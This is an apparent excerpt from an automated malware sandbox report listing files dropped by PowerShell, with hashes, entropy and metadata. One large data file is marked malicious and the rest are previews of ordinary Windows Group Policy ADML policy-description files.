                                                                                          SHA-256:9F5B1AD41183BA50896EB09BE917B1382980224E212A97080D33C0BF3DEE40DD
                                                                                          SHA-512:E62E1B985939688AA2EB920F5CFA50377934A8256D7AAA8A1DEF705DE1D47E5CD15515D043622553BBE512469F5C2ED05A7BDEDD4F5D17E99109274F9BFFE95C
                                                                                          Malicious:true
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):6175880
                                                                                          Entropy (8bit):5.4706772583563845
                                                                                          Encrypted:false
                                                                                          SSDEEP:49152:sLFPZAKkA/koZdvvVqdkTZdvvVqwkF/yWzmJUTvU8ZaTG2os1y3JkkaXSqDJMuXR:WLwW
                                                                                          MD5:731A70D555B49A74607EFA43D407948F
                                                                                          SHA1:01B9D0CF34EAB6D171A819C0A6A694B8B499702E
                                                                                          SHA-256:94B15729530FCF90D11156D38FFD0152ACE21182EE44E63C51DC5E2AF25345D2
                                                                                          SHA-512:4D8EB837BA3FF475F42D72DF0375CA4CC0CA18B4E3702FF39E910D67686AFB81234C457C61BDD36C8927FF73695BB19017423CDA2787242273E0BAA398DDABB0
                                                                                          Malicious:false
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with very long lines (403), with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):5601
                                                                                          Entropy (8bit):4.777090038504722
                                                                                          Encrypted:false
                                                                                          SSDEEP:48:cgeD5x8gm0fUsPXKn5o3OqALPLFS31U87GUkNAsGNuiYzXmoOX1mTXoWlIGe0FsC:LeD5pmKeC3G8SsuiYR1Pl7e0V4zZpBsV
                                                                                          MD5:46876B1E6C8BA1FBF3ABC838CCF809B0
                                                                                          SHA1:45CE70EDD0CA87A5920D43385066087DF134E30F
                                                                                          SHA-256:F49428CABB6F6671D95EF214133100C268D2AB04DBF0F095DD08B0105ED9D8A7
                                                                                          SHA-512:702C319B2D181753BE99D99C3DFF9F6C578934067C89A614E9E4B0A5DA6A0FB3545A3BA4986E12E9DA5DE8C6AF56780982D181A8D949A6E573AF725E2505DECA
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>ActiveX Installer Service</displayName>.. <description>Installs ActiveX controls from approved installation sites</description>.. <resources>.. <stringTable>.. <string id="AxInstSv">ActiveX Installer Service</string>.. <string id="AxISURLZonePolicies">Establish ActiveX installation policy for sites in Trusted zones</string> .. <string id="AxISURLZonePolicies_explain">This policy setting controls the installation of ActiveX controls for sites in Trusted zone. ....If you enable this policy setting, ActiveX controls are installed according to the settings defined by this policy setting. .. ..If you disable or do not configure t
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with very long lines (496), with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):10736
                                                                                          Entropy (8bit):4.664813059485856
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:Eyvs59wT2mCtKNSMRdMi4LBDZDHZEzT+ygx5LDkFdzj9nWyihWhqeGzpbeEKJ28m:ZvyiCDdyTO54zj9na8hqe6pbeEK5jq
                                                                                          MD5:DFE20A0CA8674D6EAEA280C139E2688A
                                                                                          SHA1:97027B92D40F5029FF296A9EA3105B775B50C209
                                                                                          SHA-256:C97CD236F8BE2B235685D3D16632482839208604DB3F550F9524EAFDA33B9CA9
                                                                                          SHA-512:120C45BD17045B6F3D4A9295E1888D81FFA99ED0F1D146AA2EEC387C1187EEF8C718179771BC0CDBE01A37A487D933F55C92F6F37954F392F007CBFAA2AEC877
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="Arp">Add or Remove Programs</string>.. <string id="DefaultCategory">Specify default category for Add New Programs</string>.. <string id="DefaultCategory_Help">Specifies the category of programs that appears when users open the "Add New Programs" page.....If you enable this setting, only the programs in the category you specify are displayed when the "Add New Programs" page opens. Users can use the Category box on the "Add New Programs" page to display programs in other categories.....To use this setting,
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with very long lines (565), with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):10119
                                                                                          Entropy (8bit):4.722381803392372
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:EsMVhCuGKXl6hIAtZUqxw66Utw0Uvk3EUN2X/TDcvEn:J/uX6GAjj6mcvk3EUN2XXcvQ
                                                                                          MD5:93C28840D18ED15AF63308926F5AAC66
                                                                                          SHA1:5ED7A8056F1E8A68FEA17C6EF81B695DF8A3EA70
                                                                                          SHA-256:0AC43A8DF0E8795968C0F9B6ECC6FBF620B761C128545AD689EEC5DFF21F5F1D
                                                                                          SHA-512:653B9905DC0BBDE62F06EFA1C613F4E4A0823331D31D396DB0226FDB41A9AD4D148C1B5DABFA0CA64A74156F5AD446428F3344FFE75828A7C8225D3F0D214758
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="AppCompat">Application Compatibility</string>.. <string id="AppCompat_Prevent16BitMach_Help">Specifies whether to prevent the MS-DOS subsystem (ntvdm.exe) from running on this computer. This setting affects the launching of 16-bit applications in the operating system.....You can use this setting to turn off the MS-DOS subsystem, which will reduce resource usage and prevent users from running 16-bit applications. To run any 16-bit application or any application with 16-bit components, ntvdm.exe must be allowed
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with very long lines (394), with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):4462
                                                                                          Entropy (8bit):4.744620806615911
                                                                                          Encrypted:false
                                                                                          SSDEEP:96:jJpm5IJUVaBfgHt6kNEmB+kClbNpbj03V:Xc3AIHF20F
                                                                                          MD5:BF19DB2E91EDEFE517515BA23B30103E
                                                                                          SHA1:324D98B315D7F8E096D8D61505610706D0C73856
                                                                                          SHA-256:42778994D23CDB74C446E70C30942991E89DF6AACC1225AEBB05464D69DA6DEC
                                                                                          SHA-512:9C193CD9597F90913643CDD2079E36930E60B6AB539D96BA0D5DA7EA2B5DDE0B78D7451D0A4AC37CBBB8A90C548285FBF640099EDA949665E186586D893ADB14
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. Copyright (C) Microsoft. All rights reserved. -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>App runtime</displayName>.. <description>App runtime policies</description>.. <resources>.. <stringTable>.. <string id="AppxRuntime">App runtime</string>.. <string id="AppxRuntime_Help">Contains settings to manage the behavior of Windows Store apps.</string>.. <string id="AppxRuntimeBlockFileElevation">Block launching desktop apps associated with a file.</string>.. <string id="AppxRuntimeBlockFileElevationExplanation">This policy setting lets you control whether Windows Store apps can open files using the default desktop app for a file type. Because desktop apps run at a higher integrity level than Windows Store apps
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):3093
                                                                                          Entropy (8bit):4.7903363478779735
                                                                                          Encrypted:false
                                                                                          SSDEEP:48:c0Jx8gm9JcfSB2W27u0jX9X/f4kvqGbRG4QXzgtWFV:jJpm9Jc62Dv5bRjWFV
                                                                                          MD5:B182F0B429A84D7E97C3D50EADF154A5
                                                                                          SHA1:87DDA04EDCFE5E6C22F0224D9EE8375E0920B7F6
                                                                                          SHA-256:5CD8B222AECBDEAC3DF2DE6B774AF7E02988981136F6E5E9CD3D12735C6A6416
                                                                                          SHA-512:C42670FA053734C1B909FBB1AE189D4ACF72B290679C1564D78276022BDF0AFD279558C608F00953325E5AEE47EB93DF35C5AFDBB29F698E5C8F808610DB5055
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. Copyright (C) Microsoft. All rights reserved. -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. displayName and description are not used. Not supported by current Group Policy tools. -->.. <displayName>Appx Package Manager</displayName> .. <description>Appx Package Manager</description>.. <resources>.. <stringTable>.. <string id="AppxDeployment">App Package Deployment</string>.. <string id="AppxDeploymentAllowAllTrustedApps">Allow all trusted apps to install</string>.. <string id="AppxDeploymentAllowAllTrustedAppsExplanation">This policy setting allows you to manage the installation of trusted line-of-business (LOB) Windows Store apps.....If you enable this policy setting, you can install any LOB Windows Store app (which m
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with very long lines (564), with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):9845
                                                                                          Entropy (8bit):4.7103779388766025
                                                                                          Encrypted:false
                                                                                          SSDEEP:96:LeD5pmiPXXvXd0GkXgueX0dX0LhTW9jS+9FMDPaSPL9DVH60XZgn9ZE60Y2IHm0s:EZHvmQ/WXtyPHPLuV3HmEPdHK
                                                                                          MD5:156ADEBCA5CD43E0D849F921B26594C3
                                                                                          SHA1:0DCDA3A3C5CDB824D7FAE9FD2D52638DE6BAC841
                                                                                          SHA-256:6974AEBDCB65AB63DECD224D3C060F0AFCA11E00C781657EAD44F64073094BF8
                                                                                          SHA-512:32DC4890719AAEBC7CB5A088EF7C4FD7A86207C36E76C0FA60584E3DF0687C2DF297CBF82750885BCD42542700BD0D14011D57D9CED9FC32E582F70061C68013
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="AM_AM">Attachment Manager</string>.. <string id="AM_CallIOfficeAntiVirus">Notify antivirus programs when opening attachments</string>.. <string id="AM_EstimateFileHandlerRisk">Trust logic for file attachments</string>.. <string id="AM_ExplainCallIOfficeAntiVirus">This policy setting allows you to manage the behavior for notifying registered antivirus programs. If multiple programs are registered, they will all be notified. If the registered antivirus program already performs on-access checks or scans
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with very long lines (369), with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):1846
                                                                                          Entropy (8bit):4.78689414618934
                                                                                          Encrypted:false
                                                                                          SSDEEP:48:cgeD5x8gmsYLytG4rpdfUMo5mvS3bHpWdPV:LeD5pmvWvp+5wwWNV
                                                                                          MD5:71075FCE08402095AEAFBE57962A1F5B
                                                                                          SHA1:F76FAE255AA5454217FE973C4A8035EC9005B923
                                                                                          SHA-256:6928FAAD9624BBF4C74F6C138496A4C6AE8D04919C3DE9591568300C1DD39E59
                                                                                          SHA-512:9DF7480E584B16D1B504E2503B3C4C8422EFC2FA37D9A4ACEB8A7AEA0561C0D73E8E73CB21FEA20C6EC3BBBCB715C155EFDA7B8E38B7B448BCDA5DB10D773DE4
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>Audit Process Creation</displayName>.. <description>Configuration settings for auditing process creation.</description>.. <resources>.. <stringTable>.. <string id="AuditSettings">Audit Process Creation</string>.. <string id="IncludeCmdLine">Include command line in process creation events</string>.. <string id="IncludeCmdLine_explain">This policy setting determines what information is logged in security audit events when a new process has been created.....This setting only applies when the Audit Process Creation policy is enabled. If you enable this policy setting the command line information for every process will be logged in plain tex
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):4884
                                                                                          Entropy (8bit):4.732776627339853
                                                                                          Encrypted:false
                                                                                          SSDEEP:96:LeD5pmCRsKp7RqiPKhB3a1jejcM64iVDJaqV:ELRRp74a1AbodJ7
                                                                                          MD5:935C602DAD3F4335BD16C269E66DBFAA
                                                                                          SHA1:3DF4DC6D55AF20F0593D807FB4FDEFB23CC3355A
                                                                                          SHA-256:8773998440C8D534FA69833174D05D09088F07E6E5C0E41D7C04A229C7903879
                                                                                          SHA-512:05ABFFC0CE836F7438BC711A9D2B5CEB8F3F1C48BE2AC9C1A91D286AED6FC4C8D740AE802DCD2CC65D066972DC8DAA84AD8A10FA775D66CB5F3DE34688D975EC
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="AutoPlay">AutoPlay Policies</string>.. <string id="AutoPlay_Help">Configure various AutoPlay behaviors.</string>.. <string id="NoAutorun">Set the default behavior for AutoRun</string>.. <string id="NoAutorun_Help">This policy setting sets the default behavior for Autorun commands..... Autorun commands are generally stored in autorun.inf files. They often launch the installation program or other routines..... Prior to Windows Vista, when media containing an autorun command is inserte
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with very long lines (381), with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):4309
                                                                                          Entropy (8bit):4.706598922443907
                                                                                          Encrypted:false
                                                                                          SSDEEP:96:oD5pmJFp5A8M9DIn0C3ppMdiD+BukevPCRTqCV:+Mp5lM9M3ppUiC2vPClP
                                                                                          MD5:C32F834C78DC4DB3C12084AB5115E4A5
                                                                                          SHA1:BE211306E8BA801EDD43E68E28F98947354A35BC
                                                                                          SHA-256:4222D7C39B72F570C01F76EE084278BD32619D039F197A1AAE0B508C4E2CAF32
                                                                                          SHA-512:2551575C490A8B4C36FD0E44B4E7C27693DF94C74715BC0F242BE2F947AE2AF097D574AC1823F3ACC71E8D69C17D6257192AAB1255B25C3122F4196C10B9F674
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2008 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>Biometrics Configuration Settings</displayName>.. <description>Biometrics Configuration Settings</description>.. <resources>.. <stringTable>.. <string id="BiometricsConfiguration">Biometrics</string>.. <string id="Biometrics_EnableBio">Allow the use of biometrics</string>.. <string id="Biometrics_EnableBio_Help">This policy setting allows or prevents the Windows Biometric Service to run on this computer... ..If you enable or do not configure this policy setting, the Windows Biometric Service is available, and users can run applications that use biometrics on Windows. If you want to enable the ability to log on with biometrics, yo
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with very long lines (534), with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):32159
                                                                                          Entropy (8bit):4.887654356231583
                                                                                          Encrypted:false
                                                                                          SSDEEP:768:Uw9+2pWqx80t3lMsQAZ5nV7smu7CQ62TDw4p2L:H+2Lx8Q3lLB+wx
                                                                                          MD5:F6E746CD330A73B928C14770D9645BD0
                                                                                          SHA1:7EDED72EB36035A93AF3943B6F5F330082307968
                                                                                          SHA-256:80D730B14BBB66B29360C108C8A57E09AA33E57DC1C9EAFFCAD5D66B3EF98C31
                                                                                          SHA-512:6295E9062941DAEDCF4BF3E5BEBA03010AFDE880F43E95052DBCE3FDB485C92C73B0CB57E9374F691C79FA43044CFCBBDB92CDE189E1C3AFF90024B19B525F1E
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.2" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. Supported Platforms -->.. <string id="SUPPORTED_WindowsXPSP2WindowsNETSP1orBITS20">Windows XP SP2 or Windows Server 2003 SP1, or computers with BITS 2.0 installed.</string>.. <string id="SUPPORTED_WindowsXPWindowsNETorBITS15">Windows XP or Windows Server 2003, or computers with BITS 1.5 installed.</string>.. <string id="SUPPORTED_Windows7OrBITS35">Windows 7 or computers with BITS 3.5 installed.</string>.. <string id="SUPPORTED_Windows8OrBITS5">Windows 8 or Windows Server 2012 or Windows RT or computers
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):1949
                                                                                          Entropy (8bit):4.91759301234844
                                                                                          Encrypted:false
                                                                                          SSDEEP:24:2dgeD5eo8gWt4+3Fbef61yMPs9IsKiz+d9Wz+fWz+MJe4UNr2ce4u5qHLuB1XR0r:cgeD5x8gm8fKfiI9W+WwUzqG1XGPV
                                                                                          MD5:CB1E5DCF00DD4AA26834F7F02EA4AA0E
                                                                                          SHA1:EAEBB6A75FE6AEEC3AFE914DF9DAD9BCB08702C1
                                                                                          SHA-256:7651F59A99180721F39B02391BB51D382B39DBCD15E3E2245B10778B7A8A5D95
                                                                                          SHA-512:BC84BD30E99735495803360F061088334736CAF9D7AE1C5FAD9C484D949991F09C59D6FB818DE35F6328E94FEDD63C2C6D80D63ACDF616BF936762CBF656AE3A
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="WindowsCEIPCat">Windows Customer Experience Improvement Program</string>.. <string id="CorporateSQM">Allow Corporate redirection of Customer Experience Improvement uploads</string>.. <string id="CorporateSQMExp">If you enable this setting all Customer Experience Improvement Program uploads are redirected to Microsoft Operations Manager server.....If you disable this setting uploads are not redirected to a Microsoft Operations Manager server.....If you do not configure this setting uploads are not redirect
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):1670
                                                                                          Entropy (8bit):4.895822032017801
                                                                                          Encrypted:false
                                                                                          SSDEEP:24:2dgeD5eo8gWt4+3Fbef61yr7g9f8rbcFCv/9g4+4R4ldQ8o9+YPb+aDDWFV:cgeD5x8gm8fKN2fcFC2u47QxQ3aDDWFV
                                                                                          MD5:33757EAC0441251ACE18BD74FF8E2BD0
                                                                                          SHA1:B9DBC0B240CF803AFACB5D8D9AD26E39B757B04B
                                                                                          SHA-256:44FA3B1E818EF70305AD41012D78CF140851EC0949D4F2457F60C295E31C8EDC
                                                                                          SHA-512:5FB7BD40C37EAB269C7E9CF72EFB29D6A6A2EF76DB29DADD628866143A15FCEE46C865BE54C66D7C6ADE13766FF1A3028912BDF8BE05F1A6CD69D254431180C2
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="AppMgmt_COM_SearchForCLSID">Download missing COM components</string>.. <string id="AppMgmt_COM_SearchForCLSID_Help">This policy setting directs the system to search Active Directory for missing Component Object Model (COM) components that a program requires.....Many Windows programs, such as the MMC snap-ins, use the interfaces provided by the COM components. These programs cannot perform all their functions unless Windows has internally registered the required components.....If you enable this policy setting
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with very long lines (1488), with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):6011
                                                                                          Entropy (8bit):5.030765177000099
                                                                                          Encrypted:false
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="SSLConfiguration">SSL Configuration Settings</string>.. <string id="SSLCipherSuiteOrder">SSL Cipher Suite Order</string>.. <string id="SSLCipherSuiteOrder_Help">This policy setting determines the cipher suites used by the Secure Socket Layer (SSL)..... If you enable this policy setting, SSL cipher suites are prioritized in the order specified..... If you disable or do not configure this policy setting, the factory default cipher suite order is used..... SSL2, SSL3, TLS 1.0 and T
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):10980
                                                                                          Entropy (8bit):4.778547657476326
                                                                                          Encrypted:false
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="AllowPersistAutoAcceptCalls">Allow persisting automatic acceptance of Calls</string>.. <string id="AllowPersistAutoAcceptCalls_Help">Make the automatic acceptance of incoming calls persistent.</string>.. <string id="AppSharing">Application Sharing</string>.. <string id="AudioVideo">Audio &amp; Video</string>.. <string id="DisableAdvCallingButton">Disable the Advanced Calling button</string>.. <string id="DisableAdvCallingButton_Help">Disables the Advanced Calling button on the General Optio
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with very long lines (545), with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):6210
                                                                                          Entropy (8bit):4.659729688008146
                                                                                          Encrypted:false
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="DisallowCpls">Hide specified Control Panel items</string>.. <string id="DisallowCpls_Help">This setting allows you to display or hide specified Control Panel items, such as Mouse, System, or Personalization, from the Control Panel window and the Start screen. The setting affects the Start screen and Control Panel window, as well as other ways to access Control Panel items, such as shortcuts in Help and Support or command lines that use control.exe. This policy has no effect on items displayed in PC settings...
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with very long lines (334), with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):21011
                                                                                          Entropy (8bit):4.7324938774717955
                                                                                          Encrypted:false
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="Display">Display</string>.. <string id="CPL_Display_Disable">Disable the Display Control Panel</string>.. <string id="CPL_Display_Disable_Help">Disables the Display Control Panel.....If you enable this setting, the Display Control Panel does not run. When users try to start Display, a message appears explaining that a setting prevents the action.....Also, see the "Prohibit access to the Control Panel" (User Configuration\Administrative Templates\Control Panel) and "Remove programs on Settings menu" (User Configuration\Administrative Templates\Star
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):1585
                                                                                          Entropy (8bit):4.924174965870825
                                                                                          Encrypted:false
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="Users">User Accounts</string>.. <string id="Users_Help">Contains settings to control the behavior of User Accounts</string>.. <string id="UseDefaultTile">Apply the default account picture to all users</string>.. <string id="UseDefaultTile_Help">This policy setting allows an administrator to standardize the account pictures for all users on a system to the default account picture. One application for this policy setting is to standardize the account pictures to a company logo.....Note: The default acc
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with very long lines (369), with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):20162
                                                                                          Entropy (8bit):4.80118154121946
                                                                                          Encrypted:false
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="AllowDefaultCredentials">Allow delegating default credentials</string>.. <string id="AllowDefaultCredentials_Explain">This policy setting applies to applications using the Cred SSP component (for example: Remote Desktop Connection).....This policy setting applies when server authentication was achieved by using a trusted X509 certificate or Kerberos.....If you enable this policy setting, you can specify the servers to which the user's default credentials can be delegated (default credentials are those that you
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, Unicode text, UTF-8 text, with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):3126
                                                                                          Entropy (8bit):4.730467503379261
                                                                                          Encrypted:false
                                                                                          Malicious:false
